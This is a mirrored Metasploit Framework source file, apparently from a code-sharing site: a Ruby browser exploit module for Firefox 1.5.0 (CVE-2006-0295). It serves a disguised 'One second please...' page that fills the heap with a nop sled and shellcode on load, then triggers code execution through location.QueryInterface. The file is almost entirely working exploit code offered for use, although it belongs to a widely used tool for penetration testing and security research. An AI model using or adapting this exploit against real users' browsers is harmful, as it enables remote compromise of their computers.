Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/firefox_queryinterface.rb
31615 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Firefox location.QueryInterface() Code Execution',

19
        'Description' => %q{

20
          This module exploits a code execution vulnerability in the Mozilla

21
          Firefox browser. To reliably exploit this vulnerability, we need to fill

22
          almost a gigabyte of memory with our nop sled and payload. This module has

23
          been tested on OS X 10.3 with the stock Firefox 1.5.0 package.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => ['hdm'],

27
        'References' => [

28
          ['CVE', '2006-0295'],

29
          ['OSVDB', '22893'],

30
          ['BID', '16476'],

31
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],

32
        ],

33
        'Payload' => {

34
          'Space' => 1000 + (rand(256).to_i * 4),

35
          'BadChars' => "\x00"

36
        },

37
        'Targets' => [

38
          [

39
            'Firefox 1.5.0.0 Mac OS X',

40
            {

41
              'Platform' => 'osx',

42
              'Arch' => ARCH_PPC

43
            }

44
          ],

45


46
          [

47
            'Firefox 1.5.0.0 Linux',

48
            {

49
              'Platform' => 'linux',

50
              'Arch' => ARCH_X86

51
            }

52
          ],

53
        ],

54
        'DisclosureDate' => '2006-02-02',

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62
  end

63


64
  def on_request_uri(cli, _request)

65
    # Re-generate the payload

66
    return if ((p = regenerate_payload(cli)).nil?)

67


68
    print_status("Sending #{name}")

69
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

70
    handler(cli)

71
  end

72


73
  def generate_html(payload)

74
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

75
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

76


77
    return <<~EOF

78
      <html>

79
      <head>

80
      <title>One second please...</title>

81
      <script language="javascript">

82


83
      function BodyOnLoad() {

84
        h = FillHeap();

85
        location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));

86
      };

87


88
      function FillHeap() {

89
        // Filler

90
        var m = "";

91
        var h = "";

92
        var a = 0;

93


94
        // Nop sled

95
        for(a=0; a<(1024*256); a++)

96
          m += unescape("#{enc_nops}");

97


98
        // Payload

99
        m += unescape("#{enc_code}");

100


101
        // Repeat

102
        for(a=0; a<1024; a++)

103
          h += m;

104


105
        // Return

106
        return h;

107
      }

108
      </script>

109
      </head>

110
      <body onload="BodyOnLoad()">

111
      </body>

112
      </html>

113
    EOF

114
  end

115
end

116


117